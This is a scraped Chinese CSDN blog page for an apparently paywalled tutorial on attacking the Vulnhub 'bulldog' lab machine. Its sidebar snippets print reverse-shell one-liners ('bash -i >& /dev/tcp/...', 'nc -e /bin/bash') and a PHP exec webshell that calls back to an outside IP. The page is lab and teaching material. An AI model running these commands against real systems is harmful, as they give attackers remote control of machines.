[网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)

最新推荐文章于 2024-02-18 22:30:57 发布
最新推荐文章于 2024-02-18 22:30:57 发布
阅读量1.1w 收藏 19
点赞数 5
分类专栏: 网络安全自学篇 文章标签: 网络安全 Vulnhub bulldog 信息收集 反弹shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Eastmount/article/details/106066009
版权
网络安全自学篇 专栏收录该内容
120 篇文章 3350 订阅 ¥49.90 ¥99.00
订阅专栏
本文是网络安全自学教程的一部分,详细介绍了Vulnhub靶机bulldog的渗透过程,包括信息收集、端口扫描、目录扫描、源码解读、权限提升和shell反弹。作者通过分析靶机信息,利用命令注入和Webshell反弹shell,最终获取root权限并找到flag。文章适合网络安全初学者学习。
摘要由CSDN通过智能技术生成

这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施。这篇文章将讲解Vulnhub靶机渗透题目bulldog,包括信息收集及目录扫描、源码解读及系统登陆、命令注入和shell反弹、权限提升和获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。

作者作为网络安全的小白,分享一些自学基础教程给大家,主要是关于安全工具和实践操作的在线笔记,希望您们喜欢。同时,更希望您能与我一起操作和进步,后续将深入学习网络安全和系统安全知识并分享相关实验。总之,希望该系列文章对博友有所帮助,写文不易,大神们不喜勿喷,谢谢!如果文章对您有帮助,将是我创作的最大动力,点赞、评论、私聊均可,一起加油喔~

文章目录

PS:本文参考了github、安全网站和参考文献中的文章(详见参考文献),并结合自己的经验和实践进行撰写,也推荐大家阅读参考文献。

作者的github资源:
软件安全:https://github.com/eastmountyxz/Software-Security-Course
其他工具:https://github.com/eastmountyxz/NetworkSecuritySelf-study
Wannacry分

了解本专栏 订阅专栏 解锁全文
Eastmount
关注
  • 5
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 7
    评论
专栏目录
订阅专栏
靶机bulldog2练习:通过反弹shell进行提权
7Riven's blog
11-22 956
环境:kali机一台:192.168.109.142、靶机bulldog2一台:192,168.109.149 扫描网段:发现有主机IP地址为192.168.109.149,存活 扫描发现目标的目标主机信息如下: -sV :版本探测 -sT :TCP connect()扫描 -sC :脚本扫描通过选项被激活 -p-:从端口1扫描到65535 -T5个级别:paranoid (0...
vulnhub - Prime 1 (考点:信息搜集 & LFI &WordPress安全& linux ubantu提权)
冬萍子癸水
04-25 366
https://www.vulnhub.com/entry/prime-1,358/ nat网络 arp-scan -l 比平常扫出来多的ip就是靶机了 nmap 很常规80想到进web搜集信息,22想到可能有ssh登录 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu...
渗透测试】靶机渗透Vulnhub-bulldog
SunnyCat
06-01 2667
目录前言一、bulldog靶机安装二、bulldog靶机渗透1、信息搜集2、Web渗透--后台登录3、Web渗透--命令注入&nc反弹shell4、权限提升渗透步骤回顾感悟 前言 bulldog靶机渗透有很多的前辈都做了教程,我这也是参考了许多前辈的博客,但是中间还是有很多不懂得地方,官方说有两条路可以拿到root,我只找到了一条。以下内容均是我作为一个菜鸡实操之后的所得,为了留个印子记下来。 参考博客: https://blog.csdn.net/Eastmount/article/detai
vulnhubbulldog 1实战攻略
weixin_43862283的博客
04-15 507
vulnhubbulldog 1实战攻略 0x01 环境配置 bulldg 1 难度:初学者 目标:提权到root权限并查看flag 攻击机:kali linux,IP地址192.168.34.179 靶机bulldog,IP地址192.168.34.160(桥接模式) 下载地址:https://www.dropbox.com/s/ygzfkfhyatbfybr/bulldog.ova?dl...
渗透测试-----信息收集(概述、whois、子域名查询、爆破、vulhub域名传送漏洞复现、kali安装docker)
Pluto.的博客
12-14 692
文章目录渗透测试信息收集1. 概述2. 供练手的网站3. whois查询4. 子域名查询域传送漏洞1. 概述2. 解决办法3. vulhub漏洞复现4. 子域名爆破 渗透测试 信息收集 1. 概述 借助各种搜索引擎、工具等从中获取相关数据,如谷歌、雅虎、MSN必应、百度等。收集的信息主要包括DNS服务器、路由关系、whois、数据库、电子邮件地址、电话号码、个人信息以及用户账户。收集的信息越多,渗透测试成功的概率越高。 2. 供练手的网站 http://testfire.net/ testfire.net
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
网络安全自学】六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1 本文主要讲述了网络安全中的靶机渗透技术,特别是通过Vulnhub平台进行环境搭建和JIS-CTF挑战。Vulnhub是一个提供虚拟机...
66.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。第1页 共25页
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
linux反弹shell的原理详解
01-08
完整命令 反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shellnc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一个交互式的bash &是为了区分文件1和文件描述符1的 a>&b 的意思是 a>b 2>&1 0代表输入 ,0>&1 意思是,将输出的窗口上所输入的值当作当前窗口的输入。反弹shell后会有两个窗口,即靶机shell窗口
Bulldog靶机 学习总结 网络安全
Shelby12345的博客
01-31 914
发现了自己django,然后注意到有个id是bulldogadmin的很可疑,再系统中查找一下bulldogadmin所属的文件find / -user bulldogadmin 2>/dev/null(输入SUPERultimatePASSWORDyouCANTget,密码错误,又去找了找前辈的答案,发现H都是多余的,SUPERultimatePASSWORDyouCANTget。直接访问http://192.168.144.137/admin/ 发现需要登陆,F12看一下很干净,没藏东西。
NC反弹Shell
qq_23066945的博客
11-23 621
NC反弹Shell 实验环境 Kali Ubuntu(开启telnet) 一、Msf登录设置 1、保证kali使用telnet能够登陆Ubuntu(假设通过爆破,弱口令成功登录telnet) 使用telnet登录模块 设置目标ip(Ubuntu),用户名,密码(可以指定密码文件)run运行 可以看到,成功登录telnet,记录会话 选择第一个会话进行连接 然后下载事先准备好的文件123...
反弹shell原理
Monica的博客
11-01 2337
原理 反弹shell(reverse shell),就是攻击端(本机)监听在某TCP/UDP端口,受害端(目标服务器)发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 实验案例 实验环境: 攻击端:mac ip地址:192.168.57.252 受害端:kali linux ip地址:10.211.5519 nc反弹: 攻击端mac终端输入: nc ...
nc+管道符的一种反弹shell姿势
07-28 953
一.什么叫反弹shell? 在计算机科学中,Shell俗称壳(用来区别于核),是指“提供使用者使用界面”的软件(命令解析器)。它类似于DOS下的command.com和后来的cmd.exe。它接收用户命令,然后调用相应的应用程序,这是来自百度百科的解释,通俗点就是说shell是一个用来执行命令的软件,比如我们常见的windows系统下的cmd.exe、powershell,linu...
linux反弹shell的原理
热门推荐
Shanfenglan's blog
08-24 27万+
完整命令 反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shellnc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一个交互式的bash &是为了
linux+反弹shell原理,linux反弹shell的原理详解
weixin_36163504的博客
05-13 291
完整命令反弹shell命令:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1bash -i > /dev/tcp/ip/port 0>&1 2>&1利用nc反弹shellnc -lvvp 12345 -t -e /bin/bash原理bash -i > /dev/tcp/ip/port 0>&a...
nc的使用+反弹shell
最新发布
2301_80366980的博客
02-18 882
记录学习linux中nc的使用,以及反弹shell仅供个人学习,如有冒犯请尽快联系。
反弹shell原理和实现
u012830303的博客
01-18 3522
当一些框架和代码,不小心让可执行shell命令的函数存在注入漏洞时,会被利用注入漏洞执行一些shell命令。入侵者为了防止漏洞被修复,无法通过正向链接侵入服务器时,会被利用shell反弹原理种马。 首先,侵入者会利用注入参数,创建一个shell.php文件,文件内容如下 通过web访问并执行shell.php文件 exec('bash -i &> /dev/tcp/10.201.61.194/5566 0>&1'); 这条命令的作用是,在服务器建立一个可以与10.201.61.
wireshark找黑客
10-05
Wireshark是一个网络封包分析软件,它可以用来检索和显示网络封包的详细数据。通过分析网络封包,Wireshark可以帮助用户发现网络中的安全问题,包括黑客攻击。用户可以使用Wireshark来查找网络中的异常流量、异常连接和异常数据包,从而发现潜在的黑客活动。 然而,使用Wireshark找到黑客并不是一件简单的事情。要找到黑客,需要对网络封包数据有深入的了解,并能够分析出具体的黑客攻击行为。在分析网络封包时,可以关注一些特征,如异常的连接尝试、异常的数据传输、异常的协议使用等,这些都可能是黑客攻击的迹象。 除了使用Wireshark分析网络封包外,还可以结合其他安全工具和技术来增强黑客攻击的检测和防御能力。例如,使用入侵检测系统(IDS)和入侵防御系统(IPS)可以实时监测网络流量,并根据特定的规则判断是否有黑客攻击行为。此外,定期进行网络安全审计和漏洞扫描也是重要的安全措施,可以帮助及早发现并修复系统中的安全漏洞。
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Eastmount

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值